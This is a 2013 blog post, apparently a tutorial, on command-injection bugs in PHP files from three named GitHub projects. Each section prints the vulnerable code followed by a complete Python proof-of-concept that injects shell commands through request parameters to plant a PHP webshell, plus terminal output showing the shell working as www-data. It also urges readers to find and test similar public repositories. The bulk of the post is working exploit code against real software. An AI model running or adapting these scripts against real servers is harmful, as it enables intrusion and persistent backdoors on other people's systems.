Tuesday 18 June 2013

[EN] RCE - another lesson (2:0)

RCE - LAB 2:0
====================================================================
And again, few examples of vulnerable codes. Few poc's included.

Have fun a take care ;)

====================================================================
All examples you will find at www.github.com:
====================================================================

1. Scilab-WebApp / db-interaction / create-delete-file.php -- (year ago)

--- < code > ---
<?php
    if(!empty($_POST['file']) && !empty($_POST['directory'])){
        if($_POST['action']=="crear"){
            shell_exec('touch ../'.$_POST['directory'].'/'.$_POST['file']);
        }
        if($_POST['action']=="borrar"){
            shell_exec('rm ../'.$_POST['directory'].'/'.$_POST['file']);
        }
        if($_POST['action']=="comprimir"){
            shell_exec('zip ../'.$_POST['directory'].'/files.zip ../'.$_POST['directory'].'/'.$_POST['file']);
        }
        if($_POST['action']=="guardar"){
            shell_exec('echo "'.$_POST['file'].'" > ../'.$_POST['directory']);
        }
    }
?>

--- < code > ---

As you can see this file is a part of bigger webapp. For our purpose, to learn
how to exploit RCE vulnerabilities, we will use only this one file. Check it out:

To exploit this vulnerability mentioned ('../') directory must be writeable.
Chmod it now (or move your 'create...' file to test-dir - 'xx' dir at my box).

Let's see, what 'actions' we have (to exploit ;]).

PoC will need this settings: (must send all via HTTP POST)
    - actions=borrar
    - directory=someDir+our;payload
    - file=whate.ver

From 'directory' parameter (for this 'action') we should have a very easy way
to exit to let's say 'bash-shell-query-line'. From here, we can add our command.

Let's create a little PoC:

--- < code > ---
kuba@lap:~/src/py/p0c$ cat scilab-webapp-poc.py
#!/usr/bin/env python
# * remember to chmod 777 to 'xx' directory
# --
import httplib, urllib
import sys
url = sys.argv[1]+':80'
path = '/kuba/github/xx/create-delete-file.php'

poc = 'echo \'<?php $c=$_GET[\'c\'];echo system($c);?>\' >> xxx.php ' # add simple backdoor webshell

params = urllib.urlencode({'action': 'borrar','directory':'./;'+poc+';#' ,'file': 'xxx.php'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(url)
conn.request("POST", path , params, headers)
response = conn.getresponse()

data = response.read()

if response.status == 200:
  print 'Server : ', response.status, response.reason
  print 'Your shell is /xxx.php\n'

else:
  print 'something\'s wrong... :C \n'
kuba@lap:~/src/py/p0c$

--- < code > ---


Output from this simple poc should be similar to this one below:
--- < code > ---
kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/xx/
total 12
drwxrwxrwx 2 kuba kuba 4096 Jun 18 15:12 .
drwxrwxr-x 9 kuba kuba 4096 Jun 18 14:48 ..
-rwxrwxrwx 1 kuba kuba  623 Jun 18 15:00 create-delete-file.php
kuba@lap:~/src/py/p0c$ ./scilab-webapp-poc.py 192.168.1.102
Server :  200 OK
Your shell is /xxx.php

kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/xx/
total 16
drwxrwxrwx 2 kuba     kuba     4096 Jun 18 15:20 .
drwxrwxr-x 9 kuba     kuba     4096 Jun 18 14:48 ..
-rwxrwxrwx 1 kuba     kuba      623 Jun 18 15:00 create-delete-file.php
-rw-r--r-- 1 www-data www-data   37 Jun 18 15:20 xxx.php
kuba@lap:~/src/py/p0c$ cat /home/kuba/public_html/github/xx/xxx.php
<?php $c=$_GET[c];echo system($c);?>
kuba@lap:~/src/py/p0c$

--- < code > ---

If you want, create PoC's for other 'actions' (let's say, as a 'homework' ;) )


========================================================
2.  Gravel / gravel-web / adduseraction.php


--- < code > ---
<?php
$username = $_POST["name"];
$executeString = 'grvladmin add user '.$username;
//echo $executeString;
$results = shell_exec($executeString);
header("Location: addusers.php");
?>

--- < code > ---

Great let's see, if we can set 'our-evil-name' for this POST parameter:


--- < code > ---
kuba@lap:~/src/py/p0c$ ./adduseraction-poc.py 192.168.1.102
Server :  302 Found
Your shell should be at 777dir//xxx.php

kuba@lap:~/src/py/p0c$ ls -la /home/kuba/public_html/github/rcelab/777dir
total 16
drwxrwxrwx 2 kuba     kuba     4096 Jun 18 15:30 .
drwxrwxr-x 6 kuba     kuba     4096 Jun 18 15:25 ..
-rw-r--r-- 1 www-data www-data   41 Jun 18 10:49 hihi.php
-rw-r--r-- 1 www-data www-data   37 Jun 18 15:30 xxx.php

kuba@lap:~/src/py/p0c$  cat adduseraction-poc.py
#!/usr/bin/env python
import httplib, urllib
import sys
url = sys.argv[1]+':80'
path = '/kuba/github/rcelab/adduseraction.php'
poc = 'echo \'<?php $c=$_GET[\'c\'];echo system($c);?>\' >> ./777dir/xxx.php ' # add backdoor webshell

params = urllib.urlencode({'name': 'x;'+poc+';#'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain",'Location':'addusers.php'}
conn = httplib.HTTPConnection(url)
conn.request("POST", path , params, headers)
response = conn.getresponse()

data = response.read()

if response.status == 302:
  print 'Server : ', response.status, response.reason
  print 'Your shell should be at 777dir//xxx.php\n'

else:
  print response.status, response.reason
  print 'something\'s wrong... :C \n'
kuba@lap:~/src/py/p0c$

--- < code > ---

Browser? Ok: http://192.168.1.102/kuba/github/rcelab/777dir/xxx.php?c=id
Response like: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Great.

Durinng this search you will probably find similar directories to this one:
https://github.com/BayshoreNetworks/l7secassay

Test it to.

========================================================
3.  lab-virtual-ufc / lab_virtual_teoria / students / renameFile.php

--- < code > ---
<?
$login = $_GET["login"];
$area = $_GET["area"];
$oldName = $_GET["oldName"];
$newName = $_GET["newName"];

system("cd $login && cd $area && mv $oldName $newName");
?>
--- < code > ---


What to do here? Let's put a webshell via this vulnerability.

--- < code > ---
kuba@lap:~/src/py/p0c$ cat renameFile-poc.py
#!/usr/bin/env python
# to exploit this vuln, we need dir where we can write file
# --
import urllib2
import sys

host = sys.argv[1]
cmd = 'x;echo%20\'<?php%20$c=$_GET[\'c\'];echo%20system($c);?>\'%20>%20./777dir/sh.php'
vulnurl = '/kuba/github/rcelab/renameFile.php?login='+cmd+'&area=./&oldName=a&newName=b'


vuln = host+vulnurl

if len(sys.argv) == 2:
  check = urllib2.urlopen(vuln)
  page = check.readlines()

  print 'RCE PoC for Tourism WebApp at: ',host
  print '[+] add webshell...'
  print '[+] your shell should be now in:  777dir/sh.php'

  for line in page:
    print line

  check.close()
else:
  print 'host cmd...\n'
kuba@lap:~/src/py/p0c$

--- < code > ---

Now if we'll run it, we should see something like:


--- < code > ---
kuba@lap:~/src/py/p0c$ ./renameFile-poc.py http://192.168.1.102
RCE PoC for Tourism WebApp at:  http://192.168.1.102
[+] add webshell...
[+] your shell should be now in:  777dir/sh.php
kuba@lap:~/src/py/p0c$

--- < code > ---

As you see after those 3 examples, searching for bugs can be very funny job :)
You can develop your skills and help other people with their projects.

Let me know if you have any questions.

Cheers!
o/


Posted by at
Labels: , , , , , ,

No comments:

Post a Comment

What do You think...?

Subscribe to: Post Comments (Atom)